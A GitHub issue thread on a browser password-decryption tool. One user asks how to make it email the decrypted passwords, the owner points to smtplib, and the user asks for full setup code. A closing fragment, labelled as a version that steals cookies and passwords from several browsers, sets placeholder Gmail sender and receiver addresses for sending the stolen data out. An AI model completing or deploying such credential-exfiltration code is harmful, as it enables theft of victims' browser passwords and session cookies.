### ISSUE TITLE
decrypt-chrome-passwords

### ISSUE THREAD

**Issue by bkjllb** [ohyicong/decrypt-chrome-passwords#1]
how can you program it to send the result to your emails decrypt-chrome-passwords

**Comment by ohyicong** [comment]
Hi, this is not an issue. You can use smtplib to do so.

**Comment by bkjllb** [comment]
can you email me the full setup code on how to place it on bkjllbtools@gmail.com


# don't forget to active  https://www.google.com/settings/security/lesssecureapps
# Version Professionel : Steal cookie,password : Chrome,Microsoft Edge,Firefox,Opera,Yandex

addr_from = 'xxxx@gmail.com' # your email to send steal_password
addr_to  = 'xxx@gmail.com  ' # receive email
password  = 'xxxxxx!' # Your gmail password
